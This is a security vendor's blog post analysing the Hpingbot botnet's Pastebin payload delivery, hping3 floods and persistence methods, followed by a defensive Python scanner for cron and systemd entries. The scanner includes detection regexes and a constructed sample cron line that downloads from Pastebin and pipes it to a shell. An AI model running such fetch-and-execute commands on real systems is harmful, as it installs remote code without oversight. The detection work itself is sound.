A New Botnet Hpingbot Leveraging Pastebin and hping3 for DDoS

A newly discovered botnet family dubbed Hpingbot is gaining attention in the cybersecurity community for its novel approach to malware delivery and DDoS execution. Detected by NSFOCUS’s Fuying Lab in June 2025, Hpingbot is a cross-platform Go-based botnet actively targeting both Windows and Linux/IoT environments—and it’s evolving fast.

Payload Delivery via Pastebin

Unlike most botnets that use traditional infrastructure for malware delivery, Hpingbot cleverly uses Pastebin—a public text-sharing platform—to distribute payloads. It embeds multiple hard-coded Pastebin links to host instructions or shell scripts (payload.sh) that download and install the malicious binaries. This allows attackers to quickly update payloads without retooling the botnet, while staying under the radar.

Real-World Testing with NetData Targets

In early activity, Hpingbot was observed launching attacks against IPs hosting the NetData performance monitoring tool. These targets may have been used to test and validate the effectiveness of Hpingbot’s DDoS modules in live environments, a tactic that suggests boldness and operational confidence from the attackers.

DDoS Attacks Using hping3

The botnet’s name is derived from its use of hping3, a legitimate network testing tool repurposed to launch customised DDoS attacks. Supported attack types include:

  • SYN, ACK, and RST floods
  • UDP floods
  • Mixed-mode “BOTOX” attacks
  • Custom TCP flag combinations

Interestingly, the Windows variant does not support hping3, yet continues to spread actively—indicating a broader intent beyond DDoS.

Persistent and Modular Design

Hpingbot ensures system persistence using a mix of Systemd, SysVinit, and Cron jobs, making it resilient across varied Linux environments. Its architecture supports multiple processor types (amd64, ARM, MIPS, etc.), and its propagation module is split from the payload, following a growing trend in modular botnet design that enables better obfuscation and tighter control.

Continuous Evolution and Professional Development

Attackers have iterated on Hpingbot at least 10 times since mid-June, updating everything from installation scripts to payload logic and C&C server addresses. The speed of updates and sophistication of the delivery chain suggest the botnet is being maintained by a professional team, potentially for long-term campaigns.

Strategic Use in APT and Ransomware Ecosystems

Beyond DDoS, Hpingbot’s ability to download and execute arbitrary payloads makes it a prime candidate for use in advanced persistent threat (APT) or ransomware operations. As attackers increasingly weaponise botnets as initial access vectors, Hpingbot could serve as a stepping stone to more severe breaches.

FastNetMon’s Take

Hpingbot is a clear signal that botnets are evolving—leveraging public platforms, open-source tools, and agile development practices to outpace defenders. While its DDoS footprint is currently limited, its payload delivery capabilities and rapid iteration cycle demand attention.

At FastNetMon, we’re continuously monitoring the shifting DDoS landscape. Our real-time traffic analysis and detection tools help customers stay ahead of threats like Hpingbot by recognising unusual network behaviours early—before damage is done.

Stay Protected


If you’re running Linux or IoT systems, monitor for suspicious use of hping3, unexpected scheduled tasks, or traffic to Pastebin. Consider tightening SSH password policies and restricting outbound traffic to known-good domains to reduce exposure.
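
The host check below is an added example, not FastNetMon or NSFOCUS code: it scans the systemd, SysVinit and cron locations for entries that reference hping3, a Pastebin URL, or a download piped to a shell. The file paths and regex rules are assumptions based on the behaviour described in this article, and the sample entries are constructed.

```python
import re
from pathlib import Path

# Persistence locations named in the article (systemd, SysVinit, cron).
# These are common Linux default paths (an assumption); adjust per distro.
PERSISTENCE_GLOBS = [
    "etc/systemd/system/**/*.service",
    "etc/init.d/*",
    "etc/crontab",
    "etc/cron.d/*",
    "var/spool/cron/**/*",
]

# Heuristics based on the behaviour described above, not published IoCs.
RULES = [
    ("hping3 in persistence entry", re.compile(r"\bhping3\b")),
    ("Pastebin URL", re.compile(r"https?://(www\.)?pastebin\.com/", re.I)),
    ("download piped to shell",
     re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|da)?sh\b")),
]

def scan_text(source, text):
    """Return (source, line_number, rule_name) for each rule hit in text."""
    return [(source, no, name)
            for no, line in enumerate(text.splitlines(), 1)
            for name, rx in RULES if rx.search(line)]

def scan_root(root="/"):
    """Scan every persistence file under root and collect all hits."""
    hits = []
    for pattern in PERSISTENCE_GLOBS:
        for path in sorted(Path(root).glob(pattern)):
            try:
                if path.is_file():
                    hits += scan_text(str(path), path.read_text(errors="replace"))
            except OSError:
                continue  # unreadable entry: skip, keep scanning
    return hits

# Constructed samples for illustration, not real Hpingbot artefacts.
SAMPLE_CRON = "*/5 * * * * root curl -s https://pastebin.com/raw/EXAMPLE | sh\n"
SAMPLE_UNIT = "[Service]\nExecStart=/usr/sbin/nginx -g 'daemon off;'\n"

if __name__ == "__main__":
    for hit in scan_text("sample-cron", SAMPLE_CRON) + scan_root("/"):
        print(*hit, sep="\t")
```

Run it as root so that per-user crontabs are readable; a hit is a lead for review, since administrators may legitimately schedule hping3 or fetch from Pastebin.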


About FastNetMon

FastNetMon is a leading solution for network security, offering advanced DDoS detection and mitigation. With real-time analytics and rapid response capabilities, FastNetMon helps organisations protect their infrastructure from evolving cyber threats. For more information, visit https://fastnetmon.com
